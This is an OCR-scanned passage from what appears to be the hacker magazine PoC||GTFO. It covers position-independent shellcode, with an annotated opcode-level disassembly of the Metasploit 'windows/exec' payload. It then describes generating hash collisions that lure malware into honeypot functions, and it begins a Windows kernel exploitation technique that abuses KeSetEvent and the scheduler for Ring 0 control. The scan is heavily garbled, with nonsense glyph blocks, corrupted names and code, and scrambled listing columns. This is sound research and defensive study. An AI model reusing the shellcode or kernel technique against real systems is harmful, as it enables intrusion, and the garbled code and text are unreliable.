cally linked, meaning it is compiled into separate 
modules and then is linked together at runtime by 
the operating system's executable loader as a sys- 
tem of imports and exports. This dynamic linkage 
is either implicit (the typical kind; dynamic library 
dependence is declared in the header and the loader 
performs the address lookups at load time) or ex- 
plicit (less common; the dynamic library is option- 
ally loaded when needed and address lookups are 
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performed with the GetProcAddress system API). 


Much of maliciously delivered code—such as 
nearly all remote exploits and most instances of code 
that is injected by one process into another—shares 
a common trait of being loaded illegitimately: it 
circumvents the legitimate sequence of being loaded 
and initialized by the OS executable loader. It is 
therefore common for malicious code to not run as 
benign code does in its own process. Because at- 
tackers want to run their code within the access and 
privilege of a target process, malicious code is in- 
jected into it either by a local malicious process or by 
an arbitrary code execution exploit. These two ap- 
proaches (code injection and exploit shellcode) can 
be treated similarly in that both of them involve 
position-independent injected code. 


Unlike benign code that is loaded by the operat- 
ing system as a legitimate executable module from 
a file on disk, illicit position-independent code must 
search and locate essential addresses in memory on 
its own without the assistance of the loader. Because 
of Address Space Layout Randomization (ASLR), 
the injected code cannot simply use pre-determined 
hardcoded addresses of these locations, and neither 
can it rely on the GetProcAddress routine, because 
it doesn’t know its address either. 


Typically, the first goal of the injected code is 
to find kerne132.d11, because it contains the APIs 
necessary to bootstrap the remainder of the mal- 
ware’s computation. Before Windows 7, everyone 
was using shellcode that assumed kerne132.d11 
was the first module in the linked list pointed to 
by the Process Environment Block (PEB), because 
it was the first DLL module loaded by the process. 
Windows 7 came along and started loading another 
module first, and that broke everyone's shellcode. 

A common solution these days is just as frag- 
ile. Some have proposed shellcode that assumes 
kernel32.d11 is the first DLL with a 12-character 
name in the list (the shellcode just looks for a mod- 
ule name length match). If we were to load in a 
DLL named PoCrGTFO.dll before kerne132.d11, 
that shellcode would fail. Other Windows 7 shell- 
code assumes that kerne132.d11is the second (now 
third) DLL in the linked list; we would be invalidat- 
ing that assumption, too. 


The MetaSploit Framework is perhaps the most 
popular exploit development and delivery frame- 
work. One can create a custom exploit reusing stan- 
dard components that MetaSploit provides, greatly 
accelerating development time. One important com- 
ponent is the payload. A “payload” in MetaSploit 
parlance is the generic (reusable by many exploits) 
portion of position-independent exploit code that at- 
tackers execute after they have successfully begun 
executing arbitrary instructions, but before they 
have managed to do anything of value. A payload's 
function can be to either establish a barebones com- 
mand & control capability (e.g., a remote shell), to 
download and execute a second stage payload (most 
common in real-world malware), or to simply exe- 
cute another program on the victim. The latter is 
the purest example of a payload, and this is what 
we will show here. The logic of the “windows /exec” 
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payload is presented in Algorithm 1. As you can see, 
it employs a relatively sophisticated method for dis- 
covering kernel32.d11, by walking the PEB data 
structure and matching the module by a hash of its 
name. 

On the following two pages, we have included an 
annotated listing of the disassembly for this payload. 
We encourage the reader to follow our comments in 
order to get an understanding for how injected code 
gets its bearings. Although this code directly locates 
the function it wants, if it were going to find more 
than one, it would probably just use this method 
to find GetProcAddress instead and use that from 
there on out. 

For clarity, the disassembly is shown with rela- 
tive addresses (offsets) only. The address operands 
in relative jump instructions have been similarly for- 
matted for clarity. 








dified i 
A VIT) == fred dit) +s, 

-P “PoCrGTFO. dll” €-.. ` 
-P *kernel32.d11" a 
y s Ox ET 

bio 
RA 3 
A 8; 

* Jı 














? 2^ 
~ Ah hash(module name) == hash("kernel32.d11") E 


^ 





Algorithm 1 The logic of a MetaSploit “exec” payload. 





/* Initialize Shellcode */ 


export address table" (exported functions) 


1: Get pointer to process” header area in memory 

2: m €-Derive a pointer to the list of loaded executable modules 

3: for each module in m 

4: Nm + Derive a pointer to the module's “base name” 

5: hm «- HasH(nm); /* rotate every byte into a sum */ 

6: t —Derive a pointer to the module's “ 

Te for each function in t 

8: ny + Derive a pointer to the function’s name 

9: hy «— HasH(ny); /* rotate every byte into a sum */ 

10: if hm and hf combine to match a precomputed value then 
11: We've found the system API (in this case, kerne132.d11's WinExec function) 
12: end if 

13: end for 

14: end for 


15: Prepare the arguments to the found API, WinEzec, then call it 




















ADDR. OPCODES INSTRUCTION COMMENT 
+ +0x00 fc cld Clears the “direction” flag (controls looping instructions to 
= follow). 
E n *0x01 e889000000 call +8F Calls its initialization subroutine. 
"E *0x06 60 pushad Initialization subroutine returns to here. Preserve all reg- 
o5 isters. 
= +0x07 89e5 mov ebp,esp Establish a new stack frame. 
< +0x09 31d2 xor edx,edx EDX starts as 0. 
+0x0B 648b5230 mov edx,dword ptr fs: [edx+30h] | Acquires the address of the Process Environment 
Block (PEB), always at an offset of 0x30 from the value 
+ in FS. 
= +0x0F 8b520c mov edx, dword ptr [edx+0Ch] Gets the address within the PEB of the PEB_LDR_DATA 
B p structure (which holds lists of loaded modules). 
ez +0x12 8b5214 mov edx, dword ptr [edx+14h] Get the “Flink” linked list pointer (within the 
o5 PEB_LDR_DATA) to the LIST_ENTRY within the first 
9 LDR. MODULE in the InMemOrderModuleList. 
< +0x15 8b7228 mov esi, dword ptr [edx+28h] Offset 0x28 within LDR_MODULE points to the base name of 
the module, as a UTF-16 string. 
+0x18 0fb74a26 movzx ecx, word ptr [edx+26h] Offset 0x26 within LDR MODULE is the base name's string 
length in bytes; used as a loop counter. 
L 3 ( +0x1C 31ff xor edi, edi The module name string “hashing” loop begins here. 
m +0x1E 31c0 xor eax, eax Clear EAX to 0. 
+ +0x20 ac lods byte ptr [esi] Recall that ESI points to the Unicode base name of a mod- 
= ule. This loads a byte of that string into AL. 
3 = +0x21 3c61 cmp al, 61h 0x0061 is “a” in UTF-16, also 0x61 is lowercase “a” in ASCII. 
"E 'This is a check for capitalization. 
o *0x23 7c02 jl +0x27 Capital letters have values below 0x61; if this letter is below 
q 0x61 then skip ahead. 
< +0x25 2c20 sub al, 20h Otherwise, capitalize the letter by subtracting 0x20. This 
is to normalize string capitalization before hashing. 
+0x27 c1cf0d ror edi, ODh Step 1 of 2 of hashing algorithm: rotate EDI to the right 
LINE 5 by 0x0D (13) bits. 
+0x2A 01c7 add edi, eax Step 2 of 2 of hashing algorithm: add to a rolling sum in 
EDI. 
+0x2C e2f0 loop +0x1E Repeat the loop (as ECX counts down). 
+0x2E 52 push edx The enumeration of exported function names begins here. 
+0x2F 57 push edi 
+0x30 8b5210 mov edx,dword ptr [edx+10h] LDR. MODULE + offset Ox10 is the image base address of the 
module. 
*0x33 8b423c mov eax,dword ptr [edx+3Ch] LDR MODULE + offset 0x3C = RVA of the start of the mod- 
+ ule's PE header. 
= +0x36 01d0 add eax, edx Image base + RVA of PE header = pointer to the PE 
E = header. 
"E *0x38 8b4078 mov eax, dword ptr [eax+78h] Offset 0x78 into a PE header is the RVA of the export 
o5 address table (EAT). 
= +0x3B 85c0 test eax, eax Test if there is no export table, in which case the value in 
< EAX is 0. 
+0x3D 744a je +0x89 If it was 0, then abort the enumeration of exports and con- 
tinue to the next module in memory. 
+0x3F 01d0 add eax, edx Else, RVA of EAT (in EAX) + image base (EDX) — this 
module's export table (EAX). 
+0x41 50 push eax Save the pointer to the EAT. 
*0x42 8b4818 mov ecx, dword ptr [eax+18h] EAT offset 0x18 holds the number of functions exported by 
= name in this module. 
E +0x45 8b5820 mov ebx,dword ptr [eax+20h] EAT offset 0x20 holds the RVA to exported function names 
T ~ table (ENT), an array of pointers. 
Em *0x48 01d3 add ebx, edx ENT RVA (in EBX) + image base (in EDX) = pointer to 
EA ENT (now in EBX). 
[el = +0x4A e33c jecxz +0x88 Loop start: if every name in the array has been hashed 
z and none matched (ECX counter reached 0), then jump to 
+0x88. 
+0x4C 49 dec ecx Otherwise, count down how many function names are left 
to check. 
+0x4D 8b348b mov esi, dword ptr [ebxtecx*4] | Working the list backwards, calculate a RVA to the next 
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exported name > ESI. 


ALGORITHM 1 
LINE 8 


LINE 9 


ALGORITHM 1 
LINE 10 


ALGORITHM 1 
LINE 11 


LINE 15 





+0x50 
+0x52 
+0x54 
+0x56 
+0x57 
+0x5A 
+0x5C 
+0x5E 
+0x60 
+0x63 


+0x66 


+0x68 


+0x69 
+0x6C 
+0x6E 
+0x72 
+0x75 
+0x77 
+0x7A 
+0x7C 
+0x80 
+0x81 
+0x82 
+0x83 
+0x84 
+0x85 
+0x86 
+0x88 
+0x89 
+0x8A 
+0x8B 
+0x8D 
+0x8F 
+0x90 
+0x92 
+0x98 
+0x99 


+0x9E 





01d6 
31ff 
31c0 
ac 
cicf0d 
01c7 
38e0 
7514 
037df8 
3b7d24 


75e2 
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8b5824 
01d3 
668b0c4b 
8b581c 
01d3 
8b048b 
01d0 
89442424 
5b 
5b 
61 
59 
5a 
51 
ffe0 
58 
5f 
5a 
8b12 
eb86 
5d 
6a01 
8d85b9000000 
50 
68318b6f87 


ffd5 





add esi, edx 

xor edi, edi 

xor eax, eax 

lods byte ptr [esi] 

ror edi, ODh 

add edi, eax 

cmp al, ah 

jne +0x54 

add edi, dword ptr [ebp-8] 


cmp edi, dword ptr [ebp+24h] 


jne +0x4A 


pop eax 


mov ebx, dword ptr [eax+24h] 
add ebx, edx 

mov cx, word ptr [ebx+ecx*2] 
mov ebx, dword ptr [eax+1Ch] 
add ebx, edx 

mov eax, dword ptr [ebx*ecx*4] 
add eax, edx 

mov dword ptr [esp+24h], eax 
pop ebx 

pop ebx 

popad 

pop ecx 

pop edx 

push ecx 

jmp eax 

pop eax 

pop edi 

pop edx 

mov edx, dword ptr [edx] 

jmp +0x15 

pop ebp 

push 1 


lea eax, [ebp+0B9h] 
push eax 


push 876F8B31h 


call ebp 
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Add RVA to image base (EDX) to calculate the pointer to 
the next exported name => ESI. 

Exported function name hashing loop begins here. EDI — 
0 

EAX = 0 

This loads a byte of the ASCII name string into AL. 

Step 1 of 2 in hashing algorithm. 

Step 2 of 2 in hashing algorithm. 

AH holds 0, so this is a tricky way of checking that AL is 
0, which would indicate the end of a string. 

If the string is not over yet, jump back and keep hashing. 
Combine the hash of the exported function name with the 
previously computed hash of the module name string that 
is stored on the stack. 

Final check of hashed name strings: does the resulting value 
equal the precomputed value (that is also stored on the 
stack) 

If not, move to the next exported function name in the 
table and repeat the hash & check. 

Else, this is the shellcode’s desired function name. Prepare 
to call this function by bringing back the location of the 
EAT. 

Offset 0x24 into the EAT is the RVA called AddressOf- 
NameOrdinals. 

RVA (in EBX) + image base (in EDX) => address of ex- 
ported name ordinals array (in EBX). 

Offset within the array of the exported function ordinals 
=> ECX. 

Offset 0x1C into the EAT is the RVA called AddressOf- 
Functions. 

RVA (in EBX) + image base (in EDX) => address of ex- 
ported functions’ RVA array. 

Offset within the array of the exported functions’ RVAs => 
ECX. 

RVA of exported function (in EAX) + image base (in EDX) 
=> pointer to function (in EAX) 

Store the function pointer in a local variable on the stack. 
Cleaning up the stack. 

Cleaning up the stack. 

More stack cleanup. 

More stack cleanup. 

More stack cleanup. 

WinExec takes two arguments pushed onto the stack before 
a call: a string indicating the executable, and a DWORD 
indicating a show/hide flag. 

This is the “cal” to the exported 
kernel32!WinExec, and the end of the shellcode. 
Execution jumps here if “this wasn't the right module." 
Alternately it also may jump here for the same reason. 
This and the last instruction: restore old values of EDI, 
EDX 

The value at EDX is the first field of a linked list node, and 
is a pointer to the next loaded module. 

Start over with determining if this is the correct module. 
Shellcode initialization begins here. 

The “show/hide” flag value for the eventual call to 
WinExec. 1 means “normal”. 
Calculate an address to the command line string. 

Push the command line parameter on the stack. 

Store the pre-computed hash value sum of “kernel32.dll” + 
“WinExec”. 

Calls/returns to +0x06. 


function, 





7.2 Shellcode Havoc: 
Generating Hash Collisions 


In the previous section, we described how PIC that 
is injected at runtime is inherently “drunk”: since 
it circumvents the normal loader, it needs to boot- 
strap itself by finding the locations of its required 
API calls. If the code is malicious, this imposes 
additional constraints, such as size restrictions (on 
the shellcode) and the inability to hardcode func- 
tion names (to avoid fingerprinting). Some malware 
is very naive and simply matches function names 
based on length or their position in the EAT; such 
approaches are easily thwarted, as described above. 
Others have proposed completely relocating the Ad- 
dress of Functions table and catching page faults 
when any code tries to access it (cf. Phrack Vol- 
ume 0x0b, Issue 0x3f, Phile #40x0f). 

Most modern (Windows 7 and newer) malware 
payloads temper their drunkenness by hashing the 
module and function names of the APIs they need to 
find. Unfortunately, the aforementioned constraints 
on shellcode mean that a cryptographically secure 
hashing algorithm would be too cumbersome to em- 
ploy. Therefore, the hashing algorithms they use are 
vulnerable to collisions. If we can generate a new 
module and/or function name that hashes to 
the same value that the malware is looking 
for, and if we ensure that the decoy mod- 
ule/function occurs before the real one in the 
EAT linked list, then any time that function 
is called we will know it is from malicious 
code. 


7.2.1 Shellcoder's Handbook Hash 


First, let's take a look at the hashing algorithm es- 
poused by Didier Stevens in The Shellcoder's Hand- 
book. In C, it's a nifty little one-liner: 


for(hash-0; *str; hash = (hash + (*str++ | Ox60)) << 1); 


Using this algorithm, the string “LoadLibraryA” 
hashes to 0xD5786. 

'The first thing to notice is that the least signifi- 
cant bit of every hash will always be a zero, so let's 
just shift the hash right by one bit to get rid of the 
zero. Next, notice that if the value of the hash is 
less than 256, then any single character that bit- 
wise matches the hash except for its sixth and sev- 
enth most significant bits (0x60 = 0b01100000) will 
be a collision. Therefore, we can try all four pos- 
sibilities: hash, hash XOR 0x20, hash XOR 0x40, 
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and hash XOR 0x60. In the case when the value of 
hash is greater than 256, we can inductively apply 
this technique to generate the other characters. 

The collision is constructed by building a string 
from right to left. A Python script that enumerates 
all possible collisions is as follows. 





1|€ = "a...z0...9 " 
S = set (C) 
3| def collide(h): 
h >= 1; 
5 if h < 256: 
for c in (0x40, 0x80, 0x60, h): 
7 s — chr(h ^ c) 
if s in S: 
9 yield s 
else: 
11 for c in map(ord, C): 
if not ((((h — (c | 0x60)) & 0x1) 
!= 0) or ((h — (c | 0x60)) < 192)): 
13 for s in collide(h — (c | 0x60)): 
yield s + chr(c) 











Running collide (‘‘LoadLibraryA’’) yields over 
100000 collisions in the first 5 seconds alone, and 
can likely produce orders of magnitude more. Here 
are the first ten: 


4baaaabaabaa  3daaaabaabaa 
2faaaabaabaa  lhaaaabaabaa 
0jaaaabaabaa ^ 4acaaabaabaa 
3ccaaabaabaa 2ecaaabaabaa 
lgcaaabaabaa  Oicaaabaabaa 


Of course, only one collision is sufficient. 


7.2.2 MetaSploit Payload Hash 


Next, let's examine the MetaSploit payload's hash- 
ing function described in the previous section. This 
function is a bit more complex, because it involves 
bit-wise rotations, making a brute-force approach 
(like we used for The Shellcoder's Handbook algo- 
rithm) infeasible. The way the MetaSploit hash 
works is: at each byte of a NULL-terminated string 
(including the terminating NULL byte), it circularly 
shifts the hash right by OxD (13) places and then 
adds the new byte. This hash was likely chosen be- 
cause it is very succinct: the inner part of the loop 
requires only two instructions (ror and add). 

'The key observation here is that, since the hash 
is additive, any prefix of a string that hashes to zero 
will not affect the overall hash of the entire string. 
That means that if we can find a string that hashes 
to zero, we can prepend it to any other string and 
the result will have the same hash: 


HasH(A) = 0 => HasH(B) = HasH(A + B). 


This hash is relatively easy to encode as a Satis- 
fiability Modulo Theories (SMT) problem, for which 
we can then enlist a solver like Microsoft's Z3 to enu- 
merate all strings of a given length that hash to zero. 
To find strings of length n that hash to zero, we cre- 
ate n character variables, c1,...,c,, and n+1 hash 
variables, ho, hi,..., An, where h; is the value of the 
hash for the substring of length i, and ho is of course 
zero. We constrain the character variables such that 
they are printable ASCII characters (although this 
is not technically necessary, since Windows allows 
other characters in the EAT), and we also constrain 
the hash variables according to the hashing method: 


hi = (hi1 >> 0x0D)|(A; 1 << (32 — 0x0D))) + c;. 


We then ask the SMT solver to enumerate all solu- 
tions in which h, = 0. We created a Python imple- 
mentation of this using Microsoft's Z3 solver, which 
is included in the feelies. It is capable of producing 
thousands of zero-hash strings within seconds. Here 
are ten of them: 


LNZLTXWQYV TPLPPTVXWX 
TPTPPTVTWX  TPNPNTVWWY 
TPNPLTVWWZ  TPNPPTVWWX 
TPNPZTVWWS TPVPZTVSWS 
TPVPXTVSWT TPVPVTVSWU 
So, for example, if we were to create 
a DLL with an exported function named 


“LNZLTXWQYVLoadLibraryA” that precedes the real 
LoadLibraryA, a MetaSploit payload would mistak- 
enly call our honeypot function. 


7.2.3 SpyEye's Hash 


Finally, let's take a look at an example from the 
wild: the hash used by the SpyEye malware, pre- 
sented in Algorithm 2. “LoadLibraryA” hashes to 
0xC8AC8026. 


Algorithm 2 The find-API-by-hashing method 
used by SpyEye. 





1: procedure HasH(name) 
2: Je 0 
for i — 0 to LEN(name) do 
left — (j << 0x07) & OxFFFFFFFF 
right + (j >> 0x19) 
j + left | right 
j + j ^ namefi] 
end for 
9: return j 
10: end procedure 


OO IS 
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As you can see, this is very similar to Meta- 
Sploit's method, in that it rotates the hash by seven 
bits for every character. However, unlike Meta- 
Sploit's additive method, SpyEye XORs the value 
of each character. That makes things a bit more 
complex, and it means that our trick of finding a 
string prefix that hashes to zero will no longer work. 
Nonetheless, this hash is not cryptographically se- 
cure, and is vulnerable to collision. 

Once again, let's encode it as a SMT problem 
with character variables cy,...,cn and hash vari- 
ables ho,..., hn. The hash constraint this time is: 


hi = ((hi—1 << 0x07)|(hi—1 >> 0x19)) E Ci, 


and we ask the SMT solver to enumerate solutions 
in which An equals the same hash value of the string 
we want to collide with. 

Once again, Microsoft's Z3 solver makes short 
work of finding collisions. A Python implementa- 
tion of this collision is also provided in the feelies. 
Here is a sample of ten strings that all collide with 
"LoadLibraryA" 


RHDBJMZHQOIP | ILPSKUXYYKKK 
YMACZUQPXKKK KMACZUQPXBKK 
KMICZUQPXBKO | KMICZURPXBKW 
KMICZUBPXBJW | KMICZVBPXBRW 
KMYCZVCPXBRW | KMYCZVAPXBRG 
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8 UMPOwn 


With the introduction of new mitigation tech- 
nologies such as DeviceGuard, Windows 10 makes 
it increasingly harder for attackers to enter the ker- 
nel through Ring 0 drivers (which are now subject to 
even stricter code integrity / signing verification) or 
exploits (as increased mitigations and PatchGuard 
validations are used to detect these). However, even 
the best-written operating system with the best- 
intentioned team of developers will encounter vul- 
nerabilities that mitigations may be unable to stop. 

Therefore, the last key element needed in de- 
fending the security boundaries of the operating 
system is a sane response to quickly patch such 
vulnerabilities—without one, the entire defensive 
strategy falls apart. Incorrectly dismissing vulnera- 
bilities as “too hard to exploit” or misunderstanding 
the security boundaries of the operating system can 
lead to unfixed vulnerabilities, which can then be 
used to work around the large amount of resources 
that were developed in creating new security de- 
fences. 

In this article, we'll take a look at an extremely 
challenging exploit—given a kernel function to sig- 
nal an event (KeSetEvent), can reliable code exe- 
cution from user-mode be achieved, if all that the 
attacker controls is the pointer to the event, which 
can be set to any arbitrary value? We'll need to take 
a deep look at the Windows scheduler, understand 
the semantics and code flows of event signaling, and 
ultimately reveal a low-level scheduler attack that 
can result in arbitrary ROP-based exploitation of 
the kernel. 


8.1 ACT I. Controlling RIP and RSP 
8.1.1 Wait Object Signaling 


To understand event signaling in the NT kernel, one 
must first understand that two types of events, and 
their corresponding wake logic mechanisms: 


1. Synchronization Events, which have a wake 
one semantic 


2. Notification Events, which have a wake any / 
wake all semantic 


The difference between these two types of events 
is encoded in the Type field of the DISPATCHER_- 
HEADER of the event's KEVENT data structure, which 
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is how the kernel internally represents these objects. 
As such, when an event is signaled, either KiSig- 
nalNotificationObject or KiSignalSynchroniz- 
ation0bject is used, which will wake up one wait- 
ing thread, or all waiting threads respectively. 

How does the kernel associate waiting threads 
with their underlying synchronization objects? The 
answer lies in the KWAIT BLOCK data structure. 
Within which we find: the type of wait that the 
thread is performing and a pointer to the thread it- 
self (known as a KTHREAD structure). The two types 
of wait that a thread can make are known as wait 
any and wait all, and they determine if a single sig- 
naled object is sufficient to wake up a thread (OR), 
or if all of the objects that the thread is waiting on 
must be signaled (AND). In Windows 8 and later, a 
thread can also asynchronously wait on an object— 
and associate an I/O Completion Port, or a KQUEUE 
as it's known in the kernel, with a wait block. For 
this scenario, a new wait type was implemented: 
wait notify. 














Therefore, simply put, a notification event will 
cause the iteration of all wait blocks—and the wak- 
ing of each thread, or I/O completion port, based 
on the wait type—whereas a synchronization event 
will do the same, but only for a single thread. How 
are these wait blocks linked you ask? On Windows 8 
and later they are guaranteed to all be allocated in a 
single, flat array, with a field in the KTHREAD, called 
WaitBlockCount, storing the number of elements. 
In Windows 7 and earlier, each wait block has a 


pointer to the next (NextWaitBlock), and the final 
wait block points back to the first, creating a circu- 
lar singly-linked list. Finally, the KTHREAD structure 
also has a WaitBlockList pointer, which serves as 
the head of the list or array. 


8.1.2 Internals Intermezzo 


Let’s step back for a moment. We, from user mode, 
control the pointer to an arbitrary KEVENT, which we 
can construct in any way we want, and our goal is to 
obtain code execution in kernel mode. Based on the 
description we’ve seen so far, what are some ideas 
that come to mind? Certainly, we could probably 
cause some memory corruption or denial of service 
activity, by creating incorrect wait blocks or an infi- 
nite list. We could cause out-of-bounds memory ac- 
cess and maybe even flip certain bits in kernel-mode 
memory. But if the ultimate possibility (given the 
right set of constraints and linked data structures) is 
that a call to KeSetEvent will cause a thread to be 
woken, are we able to control this thread, and more 
importantly, can we get it to execute arbitrary code, 
in kernel mode? Let’s keep digging into the internals 
to find out more. 


8.1.3 Thread Waking 


Suppose there exists a synchronization event, with 
a single waiter (thus, a single wait block). This 
waiter is currently blocked in a watt any fashion on 
the event and has no other objects that it is wait- 
ing on (the astute reader will note this is irrelevant, 
due to the nature of wait any). The call to KeSet- 
Event will follow the following pattern: KeSetEvent 
— KiSignalSynchronization0bject — KiTryUn- 
waitThread — KiSignalThread 


At the end of this chain, the thread’s state will 
have changed, going from what should be its cur- 
rent Waiting state to its new DeferredReady state, 
indicating that it is, in a way, ready to be prepped 
for execution. For it to be found in this state, it will 
be added to the queue of DeferredReady threads for 
the current processor, which lives in the KPRCB’s 
DeferredReadyListHead lock-free stack list. Mean- 
while, the wait block’s state, which should have been 
set to WaitBlockActive, will now migrate to Wait- 
BlockInactive, indicating that this is no longer a 
valid wait—the thread is ready to be awakened. 
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KeSetEvent 






DeferredReady 


KiDeferredReady Thread 





KiUpdateThreadState 


One of the most unique things about the N'T 
scheduler is that it does not rely on a scheduler tick 
or other external event in order to kick off schedul- 
ing operations and pre-emption. In fact, any time 
a function has the possibility to change the state 
of a thread, it must immediately react to possi- 
ble system-wide scheduler changes that this state 
transition has caused. Such functions implement 
this logic by calling the KiExitDispatcher function, 
with some hints as to what operation just occurred. 
In the case of KeSetEvent, the AdjustUnwait hint 
is used to indicate that one or more threads have 
potentially been woken. 


8.1.4 One Does Not Simply Exit the Dis- 
patcher ... 


Once inside KiExitDispatcher, the scheduler first 
checks if DeferredReady threads already exist in the 
KPRCB's queue. In our scenario, we know this will 
be the case, so let's see what happens next. A call to 
KiProcessThreadWaitList is made, which iterates 
over each thread in the DeferredReadyListHead, 
and for each one, a subsequent call to KiUnlink- 
WaitBlock occurs, which unlinks all wait blocks as- 
sociated with this thread that are in WaitBlock- 
Active state. Then, the AdjustReason field in the 
KTHREAD structure is set to the hint value we refer- 
enced earlier (AdjustUnwait here), and a potential 
priority boost, or increment, is added in the Adjust- 
Increment field of the KTHREAD. For events, this will 
be equal to EVENT. INCREMENT, or 1. 


8.1.5 Standby! Get Ready for My Thread 


As each thread is processed in this way, a call to 
KiReadyThread is finally performed. This routine's 
job is to check whether or not the thread's kernel 
stack is currently resident, as the NT kernel has 
an optimization that automatically causes the evic- 
tion (and even potential paging out) of the kernel 
stack of any user-mode waiting thread after a cer- 
tain period of time (typically 4-6 seconds). This is 
exposed through the KernelStackResident field in 
the KTHREAD. In Windows 10, a process” set of kernel 
stacks can also be evicted when a process is frozen 


as part of new behaviour for Modern (Metro) ap- 
plications, so another flag, ProcessStackCountDec- 
remented is also checked. For our purposes, let's as- 
sume the thread has a fully-resident kernel stack. In 
this case, we move onto KiDeferredReadyThread, 
which will handle the DeferredReady — Ready (or 
Standby) transition. 

Unlike a DeferredReady thread, which can be 
ready on an arbitrary processor queue, a Ready 
thread must be on the proper processor queue 
(and/or shared queue, in Windows 8 and later). Ex- 
plaining the selection algorithms is beyond the scope 
of this article, but suffice it to say that the kernel will 
attempt to find the best possible processor among: 
idle cores, parked cores, heterogeneous vs. homoge- 
neous cores, and busy cores, and balance that with 
the hard affinity, soft affinity ideal processor, and 
group scheduling ranks and weights. Once a proces- 
sor is chosen, the NextProcessor field in KTHREAD 
is set to its index. Ultimately, the following possi- 
bilities exist: 


1. An idle processor was chosen. The KiUpdate- 
ThreadState routine executes and sets the 
thread's state to Standby and sets the Next- 
Thread field in the KPRCB to the selected 
KTHREAD. The thread will start executing im- 
minently. 


2. An idle processor was chosen, which already 
had a thread selected as its NextThread. The 
same operations as above happen, but the ex- 
isting KTHREAD is now pre-empted and must be 
dealt with. The thread will start executing 
imminently. 


3. A busy processor was chosen, and this thread 
is more important. The same operations as in 
case #2 happen, with pre-emption again. The 
thread will start executing imminently. 


4. A busy processor was chosen, but this thread is 
not more important. KiAddThreadToReady- 
Queue is used instead, and the state will be 
set to Ready instead. The thread will execute 
at a later time. 


8.1.6 Internals Secondo Intermezzo 


It should now become apparent that, given a cus- 
tom KTHREAD structure, we can fool the scheduler 
into entering a scenario where that thread is selected 
for immediate execution. To make things even sim- 
pler, if we can force this thread to execute on the 
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current processor, we can pre-empt ourselves and 
force an immediate switch to the new thread, with- 
out disturbing other processors and worrying about 
pre-empting other threads. 

In order to go down this path, the KTHREAD we 
create must have a single, fixed, hard affinity, which 
will be set to our currently executing processor. We 
can do this by manipulating the Affinity field of 
the KTHREAD. This will ensure that the scheduler 
does not look at any idle processors. It must also 
have the current processor as its soft affinity, or ideal 
processor, so that the scheduler does not look at any 
other busy processors. By restricting all idle proces- 
sors from selection and ignoring all other busy pro- 
cessors, the scheduler will have no choice but to pick 
the current processor. 

Yet we still have to choose between path #3 and 
#4 above, and get this new thread to appear “more 
important”. This is easily done by ensuring that our 
new thread's priority (in the KTHREAD's Priority) 
field will be higher than the current thread's. 


8.1.7 Completing the Exit 


Once KiDeferredReadyThread is done with its busi- 
ness and returns to KiReadyThread, which returns 
to KiProcessThreadWaitList, which returns to Ki- 
ExitDispatcher, it’s time to act. The routine will 
now verify if it’s possible to do so based on the IRQL 
at the time the event was signalled—a level of DIS- 
PATCH_LEVEL or above will indicate that nothing can 
be done yet, so an interrupt will be queued, which 
should fire as soon as the IRQL drops. Otherwise, it 
will check if the NextThread field in the KPRCB is 
populated, implying that a new thread was chosen 
on the current processor. 

At this point, NextThread will be set to NULL 
(after capturing its value), and KiUpdateThread- 
State will be called again, this time with the 
new state set to Running, causing the KPRCB’s 
CurrentThread field to now point to this thread 
instead. The old thread, meanwhile, will be pre- 
empted and added to the Ready list with KiQueue- 
ReadyThread. 

Once that’s done, it’s time to call KiSwapCon- 
text. Once control returns from this function, the 
new thread will actually be running (i.e., it will ba- 
sically be returning from whatever had pre-empted 
it to begin with), and KiDeliverApc will be called 
as needed in order to deliver any Asynchronous Pro- 
cedure Calls (APCs) that were pending to this new 
thread. 


KiExitDispatcher is done, and it returns back 
to its caller—not KeSetEvent! As we are now on 
a new thread, with a new stack, this will actually 
probably return to a completely different API, such 
as KeWaitForSingleObject. 


8.1.8 Make It So—the Context Switch 


To understand how KiSwapContext is able to change 
to a totally different thread's execution context, let's 
go inside the belly of the beast. The first oper- 
ation that we see is the construction of the ex- 
ception frame, which is done with the GENERATE - 
EXCEPTION FRAME assembly macro, which is pub- 
lic in kxamd64.inc. This essentially constructs a 
KEXCEPTION. FRAME on the stack, storing all the non- 
volatile register contents. Then, the SwapContext 
function is called. 

Inside of SwapContext, a second structure is 
built on the stack, known as the KSWITCH FRAME 
structure, it is documented in the ntosp.h header 
file (but not in the public symbols). Inside of the 
routine, the following key actions are taken on an 
x64 processor (similar, but uniquely different actions 
are taken on other CPU architectures): 


1. The Running field is set to 1 inside of the new 
KTHREAD. 


2. Runtime CPU Cycles start accumulating 
based on the KPRCB's StartCycles and 
CycleTime fields. 


3. The count of context switches is incremented 
in KPRCB's ContextSwitches field. 


4. The NpxState field is checked to see if 
FPU/XSAVE state must be captured for the 
old thread. 


5. The current value of the stack pointer RSP, 
is stored in the old thread's KernelStack 
KTHREAD field. 


6. RSP is updated based on the new thread's 
KernelStack value. 


7. A new LDT is loaded if the process owning 
the new thread is different than the old thread 
(i.e., a process switch has occurred). 


8. In a similar vein to the above, the process affin- 
ity is updated if needed, and a new CR3 value 
is loaded, again in the case of a process switch. 
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9. The RSPO is updated in the current Task State 
Segment (TSS), which is indicated by the Tss- 
Base field of the KPCR. The value is set to the 
InitialStack field of the new KTHREAD. 


10. The RspBase in the KPRCB is updated as per 


the above as well. 


11. The Running field is set to O in the old 


KTHREAD. 


12. The NpxField is checked to see if 
FPU/XSAVE state must be restored for the 


new thread. 


13. The Compatibility Mode TEB Segment in 
the GDT (stored in the GdtBase field of 
the KPCR) is updated to point to the new 
thread's TEB, stored in the Teb field of the 


KTHREAD. 


14. The DS, ES, FS segments are loaded with their 


canonical values if they were modified. 


15. The GS value is updated in both MSRs by us- 
ing the swapgs instruction and reloading the 


GS segment in between. 


16. The KPCR's NtTib field is updated to point 
to the new thread's TEB, and WRMSR is used 


to set MSR, GS. SWAP. 


17. The count of context switches is incremented 


in KTHREAD's ContextSwitches field. 


18. The switch frame is popped off the stack, and 
control returns to the caller's RIP address on 


the stack. 


Note that in Windows 10, steps 13-16 are only 
performed if the new thread is not a system thread, 
which is indicated by the SystemThread flag in the 
KTHREAD. 

Finally, now having returned back in KiSwap- 
Context again, the RESTORE EXCEPTION FRAME 
macro is used to pop off all non-volatile register state 
from the stack frame. 


8.1.9 Coda 


With the sequence of steps performed by the con- 
text switch now exposed, taking control of a thread 
is an easy matter of controlling its KernelStack field 
in the KTHREAD. As soon as the RSP value is set to 
this location, the eventual ret instruction will get us 
wherever we need to go, with full Ring 0 privileges, 
as a typical ROP-friendly instruction. 

Even more, if we return to KiSwapContext (as- 
suming we have an information leak) we have the 
